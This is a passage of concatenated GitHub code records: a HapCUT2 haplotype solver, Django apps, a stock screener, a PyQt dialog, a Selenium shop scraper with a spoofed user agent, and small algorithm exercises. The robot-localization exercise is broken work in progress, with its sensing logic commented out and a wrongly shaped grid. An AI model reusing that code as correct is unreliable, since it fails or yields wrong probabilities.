str(int(not prune)),\n ]\n with subprocess.Popen(\n command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n text=True,\n encoding=\"utf-8\",\n ) as process:\n if verbose and process.stderr is not None:\n for line in process.stderr:\n print(line, file=sys.stderr, flush=True)\n process.communicate()\n\n def _parse_hapcut2_result(self, file_path: str) -> tuple[NDArray, NDArray]:\n haplotype_0: list[int] = []\n haplotype_1: list[int] = []\n\n file_is_empty: bool = True\n with open(file_path, \"r\") as f:\n for line in f:\n file_is_empty = False\n if line.startswith(\"BLOCK\"):\n continue\n elif line.startswith(\"*\"):\n continue\n else:\n columns = line.strip(\"\\n\").split(\"\\t\")\n haplotype_0.append(int(columns[1]) + 1 if columns[1] != \"-\" else 0)\n haplotype_1.append(int(columns[2]) + 1 if columns[2] != \"-\" else 0)\n\n if file_is_empty:\n raise IOError(\"HapCUT2 output file is empty.\")\n if len(haplotype_0) == 0 or len(haplotype_1) == 0:\n raise RuntimeError(\"Failed to parse HapCUT2 output file.\")\n\n for j in self._empty_loci:\n haplotype_0.insert(j, 0)\n haplotype_1.insert(j, 0)\n\n return (\n np.array(haplotype_0, dtype=np.int8),\n np.array(haplotype_1, dtype=np.int8),\n )\n\n @staticmethod\n def _get_cost(haplotype: NDArray, fragment: NDArray) -> int:\n return ((haplotype != fragment) & (fragment > 0)).sum()\n\n def _partition_fragments(\n self, haplotypes: tuple[NDArray, NDArray]\n ) -> tuple[Sequence[int], float]:\n n_fragment, n_variant = self.n_fragment, self.n_locus\n n_haplotype = len(haplotypes)\n partition: list[int] = []\n total_cost: float = 0\n\n empty_fragments = set(self.matrix.get_empty_fragments())\n for i, fragment in enumerate(self.matrix):\n if i in empty_fragments:\n partition.append(-1)\n continue\n min_cost = float(\"inf\")\n haplotype_index: int = -1\n for i, haplotype in enumerate(haplotypes):\n cost = self._get_cost(haplotype, fragment)\n if cost < min_cost:\n min_cost = cost\n haplotype_index = i\n partition.append(haplotype_index)\n total_cost += min_cost\n return tuple(partition), total_cost\n\n def solve(\n self, *, call_homozygous=False, latency_wait: float = 2, verbose=False\n ) -> _MECSolverResult:\n with tempfile.TemporaryDirectory() as temp_directory:\n vcf_path = os.path.join(temp_directory, \"variants.vcf\")\n fragments_path = os.path.join(temp_directory, \"fragments.txt\")\n output_path = os.path.join(temp_directory, \"hapcut2.txt\")\n if verbose:\n print(f\"Making input VCF file for HapCUT2\", file=sys.stderr, flush=True)\n self._make_vcf(self.n_locus, vcf_path)\n if verbose:\n print(\n f\"Making input fragment file for HapCUT2\",\n file=sys.stderr,\n flush=True,\n )\n self._make_fragments(fragments_path)\n if verbose:\n print(f\"Running HapCUT2\", file=sys.stderr, flush=True)\n self._run_hapcut2(\n fragments_path,\n vcf_path,\n output_path,\n call_homozygous=call_homozygous,\n verbose=verbose,\n )\n time.sleep(latency_wait)\n if verbose:\n print(\"Parsing HapCUT2 output\", file=sys.stderr, flush=True)\n try:\n haplotypes = self._parse_hapcut2_result(output_path)\n except IOError:\n raise IOError(\n \"Failed to read HapCUT2 output file. Try setting a larger value for `latency_wait`.\"\n )\n if verbose:\n print(\"Partitioning fragments\", file=sys.stderr, flush=True)\n partition, cost = self._partition_fragments(haplotypes)\n return _MECSolverResult(\n haplotypes=haplotypes, partition=partition, cost=cost\n )\n\n\ndef solve_MEC(\n fragments: Sequence[Sequence[int]], *, call_homozygous=False, **kw\n) -> tuple[tuple[Sequence[int], Sequence[int]], Sequence[int], int]:\n solver = MECSolver.from_fragments(fragments)\n result = solver.solve(call_homozygous=call_homozygous, **kw)\n haplotype_1, haplotype_2 = result.haplotypes\n return (\n (tuple(haplotype_1 - 1), tuple(haplotype_2 - 1)),\n tuple(result.partition),\n result.cost,\n )\n","repo_name":"jzhang-dev/hapcut2-mec-solver","sub_path":"src/hapcut2_mec_solver/hapcut2_mec_solver.py","file_name":"hapcut2_mec_solver.py","file_ext":"py","file_size_in_byte":12860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"24102699739","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.deletion import CASCADE\n# Create your models here.\n\nclass Director(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self) -> str:\n return self.name\n\nclass Movie(models.Model):\n title = models.CharField(max_length=100)\n description = models.TextField()\n duration = models.FloatField()\n director = models.ForeignKey(Director, on_delete=models.CASCADE, related_name=\"director_name\")\n\n def __str__(self) -> str:\n return self.title\n\n @property\n def raiting(self):\n reviews = Review.objects.filter(movie=self)\n sum_ = 0\n for i in reviews:\n sum_ += i.stars\n try:\n return sum_/reviews.count()\n except:\n return 0\n \n\nclass Review(models.Model):\n stars = models.IntegerField(default=5)\n text = models.TextField()\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE, related_name=\"review\")\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True , blank=True)\n\n def __str__(self) -> str:\n return self.text\n\n\n ","repo_name":"Dierb/db-hw","sub_path":"afisha/movie_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1617568096","text":"import datetime as dt\nfrom typing import List\n\nimport pandas as pd\nimport yfinance as yf\nfrom pandas_datareader import data as pdr\nfrom yahoo_fin import stock_info as si\n\nyf.pdr_override()\n\n\"\"\"\nhttps://towardsdatascience.com/making-a-stock-screener-with-python-4f591b198261\n\"\"\"\n\n\nclass StockScreener:\n \"\"\"\n Stock Screener object.\n \"\"\"\n\n def __init__(self, index_ticker: str, stock_list: List[str]) -> None:\n \"\"\"\n Constructor for the Stock Screener object.\n\n :param index_ticker: String representing the ticker for the index (required for the calculation for RS rating)\n :param stock_list: List of Strings representing the stocks in the index\n \"\"\"\n self.index_ticker = index_ticker\n self.stock_list = stock_list\n\n self.end_date = dt.datetime.now()\n self.start_date = self.end_date - dt.timedelta(days=365)\n\n self.stocks_of_interest = []\n\n def get_index_return(self) -> float:\n \"\"\"\n Gets the returns of the index. Used for calculations for RS ratings.\n\n :return: Float representing the returns of the index\n \"\"\"\n print(f\"\\npulling {self.index_ticker}\")\n index_df = pdr.get_data_yahoo(self.index_ticker, start=self.start_date, end=self.end_date)\n index_df['percent_change'] = index_df['Adj Close'].pct_change()\n\n return index_df['percent_change'].sum() * 100\n\n @staticmethod\n def get_rs_rating(df: pd.DataFrame, index_return: float) -> float:\n \"\"\"\n Gets the RS ratings.\n\n :param df: DataFrame representing the stock\n :param index_return: Float representing the returns of the index\n :return: Float representing the RS ratings\n \"\"\"\n df['percent_change'] = df['Adj Close'].pct_change()\n stock_return = df['percent_change'].sum() * 100\n\n return round((stock_return / index_return) * 10, 2)\n\n @staticmethod\n def get_current_close(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the current adjusted closing price of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the Adjusted Closing Price\n \"\"\"\n return df['Adj Close'][-1]\n\n @staticmethod\n def get_sma_50(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the latest value of the 50 Day Simple Moving Average of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the 50 Day SMA\n \"\"\"\n df['sma_50'] = round(df['Adj Close'].rolling(window=50).mean(), 2)\n\n return df['sma_50'][-1]\n\n @staticmethod\n def get_sma_150(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the latest value of the 150 Day Simple Moving Average of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the latest value of the 150 Day SMA\n \"\"\"\n df['sma_150'] = round(df['Adj Close'].rolling(window=150).mean(), 2)\n\n return df['sma_150'][-1]\n\n @staticmethod\n def get_sma_200(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the latest value of the 200 Day Simple Moving Average of the stock\n\n :param df: DataFrame representing the stock\n :return: Float representing the latest value of the 200 Day SMA\n \"\"\"\n df['sma_200'] = round(df['Adj Close'].rolling(window=200).mean(), 2)\n\n return df['sma_200'][-1]\n\n @staticmethod\n def get_sma_200_20(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the previous 1 month value of the 200 Day Simple Moving Average of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the previous 1 month value of the 200 Day SMA\n \"\"\"\n return df['sma_200'][-20]\n\n @staticmethod\n def get_low_52_week(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the 52 week low price.\n\n :param df: DataFrame representing the stock\n :return: Float representing the 52 week low price\n \"\"\"\n return min(df['Adj Close'][-260:])\n\n @staticmethod\n def get_high_52_week(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the 52 week high price\n\n :param df: DataFrame representing the stock\n :return: Float representing the 52 week high price\n \"\"\"\n return max(df['Adj Close'][-260:])\n\n def get_stocks(self) -> pd.DataFrame:\n \"\"\"\n Screens the stocks and selects based on 8 conditions.\n\n Condition 1: Current Price > 150 SMA and > 200 SMA\n Condition 2: 150 SMA and > 200 SMA\n Condition 3: 200 SMA trending up for at least 1 month (ideally 4-5 months)\n Condition 4: 50 SMA > 150 SMA and 50 SMA > 200 SMA\n Condition 5: Current Price > 50 SMA\n Condition 6: Current Price is at least 30% above 52 week low (many of the best are up to 100-300% before coming out of consolidation)\n Condition 7: Current Price is within 25% of 52 week high\n Condition 8: IBD RS rating is greater than 70\n\n :return: DataFrame representing the selected stocks\n \"\"\"\n print('Beginning screening process...\\n')\n len_stock_list = len(self.stock_list)\n\n index_return = self.get_index_return() # used for RS rating\n\n for counter, stock in enumerate(self.stock_list):\n try:\n print(f\"\\npulling {stock} with index {counter}/{len_stock_list}\")\n df = pdr.get_data_yahoo(stock, start=self.start_date, end=self.end_date)\n\n assert 'Adj Close' in df.columns, 'column Adj Close is missing from dataframe!'\n\n rs_rating = self.get_rs_rating(df, index_return)\n current_close = self.get_current_close(df)\n sma_50 = self.get_sma_50(df)\n sma_150 = self.get_sma_150(df)\n sma_200 = self.get_sma_200(df)\n low_52_week = self.get_low_52_week(df)\n high_52_week = self.get_high_52_week(df)\n\n sma_200_20 = self.get_sma_200_20(df)\n\n condition_1 = current_close > sma_150 > sma_200\n condition_2 = sma_150 > sma_200\n condition_3 = sma_200 > sma_200_20\n condition_4 = sma_50 > sma_150 > sma_200\n condition_5 = current_close > sma_50\n condition_6 = current_close >= 1.3 * low_52_week\n condition_7 = current_close >= (0.75 * high_52_week)\n condition_8 = rs_rating >= 70\n\n if condition_1 and condition_2 and condition_3 and condition_4 and condition_5 and condition_6 and condition_7 and condition_8:\n self.stocks_of_interest.append({\n 'Date': self.end_date,\n 'Counter': counter,\n 'Ticker': stock,\n 'RS Rating': rs_rating,\n 'Current Close': current_close,\n '50 Day MA': sma_50,\n '150 Day MA': sma_150,\n '200 Day MA': sma_200,\n '52 Week Low': low_52_week,\n '52 Week High': high_52_week\n })\n\n print(f\"{stock} match the requirements\")\n\n except Exception as e:\n print(e)\n print(f\"An error occurred while pulling data for {stock}\")\n\n print('\\nScreening completed!')\n return pd.DataFrame(self.stocks_of_interest)\n\n\nif __name__ == '__main__':\n index_ticker = '^GSPC'\n stock_list = si.tickers_sp500()\n\n sc = StockScreener(index_ticker, stock_list)\n df_interest = sc.get_stocks()\n print(df_interest)\n\n df_interest.to_csv(f'stock_screener_output.csv', index=False)\n","repo_name":"ErnestChng/market_screener","sub_path":"stocks/stock_screener.py","file_name":"stock_screener.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"29875795118","text":"from PyQt5 import QtCore, QtWidgets, QtGui\n\n\nclass Ui_Dialog(object):\n\n def __init__(self, Dialog, allow_cancel=False, entry=False):\n self.dialog = Dialog\n self.vertical_layout = QtWidgets.QVBoxLayout(Dialog)\n self.label = QtWidgets.QLabel(Dialog)\n self.button_box = QtWidgets.QDialogButtonBox(Dialog)\n self.allow_cancel = allow_cancel\n self.entry = entry\n\n def setupUi(self):\n self.dialog.setWindowTitle(\"Login\")\n self.vertical_layout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)\n self.vertical_layout.addWidget(self.label, 0, QtCore.Qt.AlignTop)\n self.button_box.setOrientation(QtCore.Qt.Horizontal)\n\n self.dialog.setWindowFlags(QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowTitleHint)\n if self.allow_cancel:\n self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel)\n else:\n self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)\n self.button_box.setCenterButtons(True)\n self.vertical_layout.addWidget(self.button_box)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label.setFont(font)\n self.button_box.accepted.connect(self.dialog.accept)\n self.button_box.rejected.connect(self.dialog.reject)\n QtCore.QMetaObject.connectSlotsByName(self.dialog)\n\n","repo_name":"ghnr/cw-grades-qmul","sub_path":"dialogUI.py","file_name":"dialogUI.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"41948832650","text":"\"\"\" Robot Localization\nThe Environment is 2D plane with only Green and Red Grid Cell. Robot localizes based on these grid cells. \"\"\"\n\n# The function localize takes the following arguments:\n#\n# colors:\n# 2D list, each entry either 'R' (for red cell) or 'G' (for green cell)\n#\n# measurements:\n# list of measurements taken by the robot, each entry either 'R' or 'G'\n#\n# motions:\n# list of actions taken by the robot, each entry of the form [dy,dx],\n# where dx refers to the change in the x-direction (positive meaning\n# movement to the right) and dy refers to the change in the y-direction\n# (positive meaning movement downward)\n# NOTE: the *first* coordinate is change in y; the *second* coordinate is\n# change in x\n#\n# sensor_right:\n# float between 0 and 1, giving the probability that any given\n# measurement is correct; the probability that the measurement is\n# incorrect is 1-sensor_right\n#\n# p_move:\n# float between 0 and 1, giving the probability that any given movement\n# command takes place; the probability that the movement command fails\n# (and the robot remains still) is 1-p_move; the robot will NOT overshoot\n# its destination in this exercise\n#\n# The function should RETURN (not just show or print) a 2D list (of the same\n# dimensions as colors) that gives the probabilities that the robot occupies\n# each cell in the world.\n#\n# Compute the probabilities by assuming the robot initially has a uniform\n# probability of being in any cell.\n#\n# Also assume that at each step, the robot:\n# 1) first makes a movement,\n# 2) then takes a measurement.\n#\n# Motion:\n# [0,0] - stay\n# [0,1] - right\n# [0,-1] - left\n# [1,0] - down\n# [-1,0] - up\n\ndef localize(colors,measurements,motions,sensor_right,p_move):\n # initializes p to a uniform distribution over a grid of the same dimensions as colors\n pinit = 1.0 / float(len(colors)) / float(len(colors[0]))\n p = [[pinit for row in range(len(colors[0]))] for col in range(len(colors))]\n \n # >>> Insert your code here <<<\n for i in range(len(measurements)):\n p = move(p, motions[i], p_move, colors)\n p = sense(p, measurements[i], sensor_right, colors)\n\n return p\n\n\ndef sense(p, measurements, sensor_right, colors):\n #print (measurements)\n q = [[0 for row in range(len(colors[0])) for col in range(len(colors))]]\n summ = 0.0\n for x in range(len(colors[0])):\n for y in range(len(colors)):\n print (colors[x][y])\n #hit = (measurements == colors[x][y])\n #q[y][x] = (p[y][x] * (hit * sensor_right + (1-hit) * (1-sensor_right)))\n summ += q[y][x]\n\n for i in range(len(q)):\n for j in range(len(q[i])):\n q[i][j] = q[i][j] / summ\n\n return q\n\ndef move(p, motions, p_move, colors):\n q = [[0 for row in range(len(colors[0])) for col in range(len(colors))]]\n #print (motions)\n for i in range(len(q)-1):\n for j in range(len(q[i])-1):\n #print ([(j - motions[1]) % len(p[i])])\n print (motions[0])\n q[i][j] = (p_move * p[(i - motions[0]) % len(p)][(j - motions[1]) % len(p[i])]) + ((1 - p_move)* p[i][j]) \n return q\n\ndef show(p):\n for i in range(len(p)):\n print (p[i])\n print (\"NO\")\n \n \n#############################################################\n# For the following test case, your output should be \n# [[0.01105, 0.02464, 0.06799, 0.04472, 0.02465],\n# [0.00715, 0.01017, 0.08696, 0.07988, 0.00935],\n# [0.00739, 0.00894, 0.11272, 0.35350, 0.04065],\n# [0.00910, 0.00715, 0.01434, 0.04313, 0.03642]]\n# (within a tolerance of +/- 0.001 for each entry)\n\ncolors = [['R','G','G','R','R'],\n ['R','R','G','R','R'],\n ['R','R','G','G','R'],\n ['R','R','R','R','R']]\nmeasurements = ['G','G','G','G','G']\nmotions = [[0,0],[0,1],[1,0],[1,0],[0,1]]\n#print (motions[1])\np = localize(colors,measurements,motions,sensor_right = 0.7, p_move = 0.8)\nshow(p) # displays your answer\n ","repo_name":"Gopsee/Artificial-Intelligence-for-Robotics---Udacity","sub_path":"Localization/Robot Localization.py","file_name":"Robot Localization.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71484141308","text":"from scipy.sparse import csr_matrix\nfrom scipy.sparse.csgraph import maximum_flow\n\n\ndef main() -> None:\n N, _, E = map(int, input().split())\n in_, out, weight = [], [], []\n source, sink = 0, N\n for p in map(int, input().split()):\n in_.append(p)\n out.append(sink)\n weight.append(1)\n for _ in range(E):\n a, b = map(int, input().split())\n in_.append(a)\n out.append(b)\n weight.append(1)\n flow = csr_matrix((weight, (in_, out)), shape=(N+1, N+1))\n print(maximum_flow(flow, source, sink).flow_value)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"knuu/competitive-programming","sub_path":"atcoder/abc/abc010_d_scipy.py","file_name":"abc010_d_scipy.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"7543972014","text":"# Create your views here.\nfrom django.contrib.sites.models import Site\nfrom django.http import HttpResponse\nfrom django.utils.encoding import force_unicode\nfrom django.core.mail import send_mail\n\nimport json\nfrom feedback import forms\n\nimport appsettings\nsettings = appsettings.settings.feedback\n\ndef sanitize(errors):\n dct = dict((str(k),list(force_unicode(a) for a in v)) for k,v in errors.items())\n return dct\n\ndef handle_ajax(request, url):\n if not request.POST:\n return HttpResponse(json.dumps({'error':'no post recieved'}))\n else:\n post = {}\n for k in request.POST:\n post[k] = request.POST[k]\n post['url'] = url\n post['site'] = Site.objects.get_current().id\n form = forms.FeedbackForm(post)\n if form.is_valid():\n form.save()\n if settings.mailto:\n try:\n send_mail('Feedback recived: '+form.cleaned_data['subject'], \n 'email: %s \\n\\n %s'%(form.cleaned_data['email'], form.cleaned_data['text']), \n 'from@example.com',\n [settings.mailto], fail_silently=False)\n except:\n return HttpResponse(json.dumps({'error':'Failed to send email'}))\n return HttpResponse(json.dumps({}))\n else:\n \n return HttpResponse(json.dumps({'errors':sanitize(form.errors)}))\n\n\n","repo_name":"clincher/django-feedback","sub_path":"feedback/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"21937567531","text":"#!/usr/bin/env python3\nfrom modules.common import simcount\nfrom modules.common.component_state import CounterState\nfrom modules.common.fault_state import ComponentInfo\nfrom modules.common.store import get_counter_value_store\n\n\ndef get_default_config() -> dict:\n return {\n \"name\": \"LG ESS V1.0 Zähler\",\n \"id\": 0,\n \"type\": \"counter\",\n \"configuration\": {}\n }\n\n\nclass LgCounter:\n def __init__(self, device_id: int, component_config: dict) -> None:\n self.__device_id = device_id\n self.component_config = component_config\n self.__sim_count = simcount.SimCountFactory().get_sim_counter()()\n self.simulation = {}\n self.__store = get_counter_value_store(component_config[\"id\"])\n self.component_info = ComponentInfo.from_component_config(component_config)\n\n def update(self, response) -> None:\n power = float(response[\"statistics\"][\"grid_power\"])\n if response[\"direction\"][\"is_grid_selling_\"] == \"1\":\n power = power*-1\n\n topic_str = \"openWB/set/system/device/{}/component/{}/\".format(\n self.__device_id, self.component_config[\"id\"]\n )\n imported, exported = self.__sim_count.sim_count(\n power,\n topic=topic_str,\n data=self.simulation,\n prefix=\"bezug\"\n )\n counter_state = CounterState(\n imported=imported,\n exported=exported,\n power=power\n )\n self.__store.set(counter_state)\n","repo_name":"StarF666/openWB","sub_path":"packages/modules/lg/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"8659905065","text":"#!/usr/bin/env python3\n\nimport sys, os\nfrom setuptools import setup\nimport configparser\n\n# ensure python version 3.5 or greater is used\nif (sys.version_info.major + .1 * sys.version_info.minor) < 3.5:\n\tprint('ERROR: please execute setup.py with python version >=3.5')\n\tsys.exit(1)\n\n# get version string from seperate file\n# https://stackoverflow.com/questions/458550/standard-way-to-embed-version-into-python-package\n# https://stackoverflow.com/questions/436198/what-is-an-alternative-to-execfile-in-python-3/437857#437857\nVERSIONFILE=\"dominion/version.py\"\nwith open(VERSIONFILE) as f:\n\tcode = compile(f.read(), VERSIONFILE, 'exec')\n\texec(code)\nif not __version__:\n\tprint(\"ERROR: unable to read version string from file {}\".format(VERSIONFILE))\n\texit()\n\nDESCR = '''dominION - for monitoring, protocoling and analysis of sequencing runs performed on the ONT GridION sequencer'''\n\n# load long description from Markdown file\nwith open('README.md', 'rb') as readme:\n\tLONG_DESCR = readme.read().decode()\n\n# check if defaults for user, host and dest are set for file transfer\nsetup_dir = os.path.dirname(os.path.abspath(__file__))\nconfig = configparser.ConfigParser(allow_no_value=True)\ninifile = os.path.join(setup_dir, \"dominion\", \"resources\", \"defaults.ini\")\nconfig.read(inifile)\nmissing_args = [arg for arg in ['user', 'host', 'dest', 'identity'] if not config['DEFAULT'][arg]]\nif missing_args:\n\tprint(\"Apparently, not all defaults for rsync sequence data transfer where set. Please enter the following information:\")\nfor arg in missing_args:\n\tif arg == \"identity\":\n\t\tconfig['DEFAULT'][arg] = input(\"full path to the identity file (private key) for key authentication: \")\n\telse:\n\t\tconfig['DEFAULT'][arg] = input(\"{} for rsync sequence data transfer (as in USER@HOST:DEST): \".format(arg))\nwith open(inifile, 'w') as f:\n\tconfig.write(f)\n\nsetup(name='dominion',\n\t version=__version__,\n\t description=DESCR,\n\t long_description=LONG_DESCR,\n\t url='http://github.com/MarkusHaak/dominION',\n\t author='Markus Haak',\n\t author_email='markus.haak@posteo.net',\n\t license='GPL',\n\t packages=['dominion'],\n\t install_requires=['watchdog', 'numpy', 'pandas', 'matplotlib', 'Jinja2'],\n\t include_package_data=True,\n\t zip_safe=False,\n\t entry_points={\"console_scripts\": ['dominion = dominion.dominion:standalone',\n\t \t\t\t\t\t\t\t\t\t'statsparser = dominion.statsparser:standalone']},\n\t scripts=['bin/watchnchop'])","repo_name":"MarkusHaak/dominION","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"6930396513","text":"import pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import make_classification\n\nfrom sklearn.metrics import log_loss\nfrom sklearn.metrics import roc_auc_score\n\n#returns a table of probabilities for the testing data\n\ndef create_probs(X,y,start,end,split,time):\n \"\"\"\n Returns a table of probabilities for the testing data and time horizons being tested. Arguments are as follows:\n \n X: full X data\n y: full y data\n start: start of the dataset\n end: end of the dataset\n split: index position of where you want to split your train and test\n time: list of horizons you're testing\n \n \"\"\"\n \n result = pd.DataFrame(y.iloc[split:end].values)\n result.index = y.iloc[split:end].index\n \n eval_metrics = pd.DataFrame(columns = ['Time_Horizon','AUC','Log_Loss'])\n\n for point in time:\n \n model = RandomForestClassifier(n_estimators=500, max_depth=4, random_state=45, max_features = 'sqrt')\n \n \n y_shift = y.shift(point) #needs to be negative to look forward\n y_shift = y_shift.fillna(0)\n \n X_train = X.iloc[start:split]\n X_test = X.iloc[split:end]\n y_train = y_shift.iloc[start:split]\n y_test = y_shift.iloc[split:end]\n \n\n model.fit(X_train, y_train)\n \n probs = model.predict_proba(X_test)\n \n evals = {'Time_Horizon': point,\n 'AUC': roc_auc_score(y_test.values, probs[:,1:]),\n 'Log_Loss': log_loss(y_test, probs)}\n \n eval_metrics = eval_metrics.append(evals, ignore_index = True)\n \n result[str(point)] = probs[:,1]\n \n result = result.drop(columns = 0)\n result.columns = ['Current Month','1 Month Horizon','3 Month Horizon','12 Month Horizon']\n \n return result, eval_metrics\n\ndef create_chart(probs_chart, column = 0):\n \n \"\"\"\n Takes in probability chart and the specific series you want to graph then graphs it with 2005+ recessions plotted\n \"\"\"\n \n x = probs_chart.index\n series = probs_chart.iloc[:,column]\n\n fig, ax = plt.subplots(figsize=(18, 6))\n\n ax.plot(x, series, linewidth=2.5, zorder=2)\n ax.scatter(x, series, s=0, zorder=1, label='_nolegend_')\n ax.axvspan(x[38],x[56], color=sns.xkcd_rgb['grey'], alpha=0.5)\n ax.axvspan(x[74],x[77], color=sns.xkcd_rgb['grey'], alpha=0.5)\n ax.axvspan(x[80],x[83], color=sns.xkcd_rgb['grey'], alpha=0.5)\n\n ax.set_title('Recession Prediction With Contractions in Real GDP Shaded in Gray', fontsize=14, fontweight='demi')\n\n ax.legend(loc='upper left', fontsize=11, frameon=True).get_frame().set_edgecolor('blue')\n\n ax.set_ylabel('% Probability of Q/Q Decrease in Real GDP')\n ax.set_xlabel('Date')","repo_name":"sandroclark/recession_predictor","sub_path":"rand_frst/gen_results_rf.py","file_name":"gen_results_rf.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42324913485","text":"list=[0,1,3,6,8,14,35]\r\nfirst=0\r\nlast=len(list)-1\r\nsearch = 10\r\n\r\nwhile first<=last:\r\n mid=(first+last) // 2\r\n if search==list[mid]:\r\n print(\"exists at\",mid+1)\r\n break\r\n elif search>list[mid]:\r\n first=mid+1\r\n else:\r\n last=mid-1\r\n\r\n\r\nif first>last:\r\n print(\"not found\")","repo_name":"JyotsnaMeda/pythonassignmet1","sub_path":"ans2b.py","file_name":"ans2b.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20800967212","text":"for _ in range(int(input())):\n input()\n arr = [int(i) for i in input().split()]\n arr.insert(0, 10e10)\n arr.append(10e10)\n mx = max(arr)\n indices = [i for i, x in enumerate(arr) if x == mx]\n del indices[0]\n del indices[-1]\n f = False\n for i in indices:\n try:\n if arr[i+1] < arr[i] or arr[i-1] < arr[i]:\n f=True\n print(i)\n break\n except:\n continue\n if not f:\n print(-1)","repo_name":"michbogos/olymp","sub_path":"codeforces/SBM/29_10_22/Dominant_Pirhana.py","file_name":"Dominant_Pirhana.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19969964337","text":"import json\nimport os\nimport time\n\nimport fake_useragent\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\nfrom selenium.webdriver.common.by import By\n\nua = UserAgent()\nfake_ua = ua.random\n\nheaders = {\n 'user-agent': fake_ua\n}\n\n\ndef get_data_dns(search, user_id=None):\n items_result = []\n with webdriver.Chrome() as browser:\n for page in range(1, 6):\n url = f'https://www.dns-shop.ru/search/?q={search}&order=discount&stock=now&p={page}'\n browser.get(url=url)\n time.sleep(2)\n soup = BeautifulSoup(browser.page_source, 'lxml')\n items = soup.find_all(class_='catalog-product')\n for item in items:\n try:\n item_name = item.findNext('a', class_='catalog-product__name').text\n except AttributeError:\n item_name = None\n try:\n item_price = item.findNext('div', class_='product-buy__price').text\n except AttributeError:\n item_price = None\n try:\n item_url = 'https://www.dns-shop.ru' + item.findNext('a', class_='catalog-product__name')['href']\n except AttributeError:\n item_url = None\n try:\n item_rating = item.findNext('a', class_='catalog-product__rating')['data-rating']\n except AttributeError:\n item_rating = None\n try:\n item_rating_count = item.findNext('a', class_='catalog-product__rating').text\n except AttributeError:\n item_rating_count = None\n items_result.append({\n 'item_name': item_name,\n 'item_price': item_price,\n 'item_url': item_url,\n 'item_rating': item_rating,\n 'item_rating_count': item_rating_count\n })\n if not os.path.exists('data'):\n os.mkdir('data')\n with open(f'data/dns-{user_id}.json', 'w', encoding='utf-8') as file:\n json.dump(items_result, file, indent=4, ensure_ascii=False)\n\n\ndef main():\n get_data_dns(input('Поиск: '))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Baradys/marketplace_bot","sub_path":"resources/dns/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8103529608","text":"#\n# @lc app=leetcode id=13 lang=python3\n#\n# [13] Roman to Integer\n#\n\n# @lc code=start\nclass Solution:\n def romanToInt(self, s: str) -> int:\n Roman = {'I': 1, 'V': 5,'X': 10,'L': 50,'C': 100,'D': 500,'M': 1000}\n i = 0\n sum = 0\n while True:\n if i == (len(s) - 1):\n break\n if Roman[s[i + 1]] > Roman[s[i]]:\n sum -= Roman[s[i]]\n else:\n sum += Roman[s[i]]\n i += 1 \n sum += Roman[s[i]]\n return sum\n\n'''\nclass Solution:\n def romanToInt(self, s: str) -> int:\n translations = {\n \"I\": 1,\n \"V\": 5,\n \"X\": 10,\n \"L\": 50,\n \"C\": 100,\n \"D\": 500,\n \"M\": 1000\n }\n number = 0\n s = s.replace(\"IV\", \"IIII\").replace(\"IX\", \"VIIII\")\n s = s.replace(\"XL\", \"XXXX\").replace(\"XC\", \"LXXXX\")\n s = s.replace(\"CD\", \"CCCC\").replace(\"CM\", 